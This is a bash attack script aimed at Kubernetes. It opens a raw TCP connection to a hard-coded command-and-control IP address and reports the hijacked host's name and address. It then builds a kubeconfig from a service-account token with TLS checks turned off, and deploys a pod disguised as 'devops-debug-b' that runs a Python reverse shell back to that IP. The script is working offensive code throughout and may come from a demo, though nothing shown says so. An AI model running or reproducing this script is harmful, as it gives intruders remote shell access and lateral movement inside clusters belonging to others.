#!/bin/bash
set -e

exec 3<>/dev/tcp/13.112.164.157/8001
echo "I have controlled a server $(hostname) ($(hostname -i))" >&3

echo "└- Also testing for command/tool" >&3
if command -v kubectl; then
echo "   └- Yes it has \"kubectl\" tool \"$(command -v kubectl)\"" >&3
fi

echo "   └- Lets setup secondary attack with Legacy SA token to use with \"kubectl\"" >&3
K8S_API_SERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
K8S_CLUSTER="local-current"
SA_TOKEN="..."

export KUBECONFIG="/tmp/sa-config.yaml"
cat <<EOF > /tmp/sa-config.yaml
apiVersion: v1
kind: Config
clusters:
- name: ${K8S_CLUSTER}
  cluster:
    server: ${K8S_API_SERVER}
    insecure-skip-tls-verify: true
users:
- name: sa-user
  user:
    token: ${SA_TOKEN}
contexts:
- name: sa-context
  context:
    cluster: ${K8S_CLUSTER}
    user: sa-user
current-context: sa-context
EOF

echo "      └- Already Launch in default/victim-b connecting to C2 Server" >&3
if kubectl -n default get pod victim-b 2>&1 >/dev/null; then
  exit 0
fi

echo "      └- Starting Launch to default/victim-b connecting to C2 Server" >&3
kubectl apply -f - <<'EOF'
---
apiVersion: v1
kind: Pod
metadata:
  namespace: default
  name: devops-debug-b
spec:
  containers:
    - name: reverse-shell
      image: python:3.12.12-alpine3.23
      stdin: true
      tty: true
      env:
        - name: C2_SERVER_IP
          value: "13.112.164.157"
        - name: C2_SERVER_PORT
          value: "8002"
      command:
        - /bin/sh
      args:
        - -c
        - |
          python -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(('${C2_SERVER_IP}',${C2_SERVER_PORT})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"
EOF
